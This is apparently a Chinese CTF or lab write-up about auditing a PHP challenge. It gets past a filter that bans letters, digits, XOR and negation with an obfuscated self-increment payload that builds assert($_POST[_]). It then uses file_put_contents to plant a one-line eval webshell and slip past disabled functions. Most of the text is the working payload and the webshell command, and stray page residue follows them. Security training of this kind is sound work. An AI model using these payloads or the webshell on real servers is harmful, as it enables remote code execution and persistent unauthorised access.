文章讲述了在对PHP代码进行审计时,如何在特定约束条件下(如禁止异或、取反及字母数字使用)构造自增payload来执行预期操作。示例中展示了如何在disabled_function禁用了多个函数后,利用file_put_contents函数进行绕过,创建了一个可接收外部输入并执行的后门。文章还提到了无字母数字的正则表达式绕过策略。
1.打开环境,审计代码。
逻辑本身不是很复杂,就是不准异或取反,且不能有字母数字,所以考虑用自增。
payload:
//测试发现7.0.12以上版本不可使用
//使用时需要url编码下
$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);
固定格式 构造出来的 assert($_POST[_]);
然后post传入 _=phpinfo();
disabled_function禁用了很多函数(system,exec等),但可以用file_put_contents函数绕过
_=file_put_contents('1.php','<?php eval($_POST['aa']);?>');知识拓展:
扫一扫
1269
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
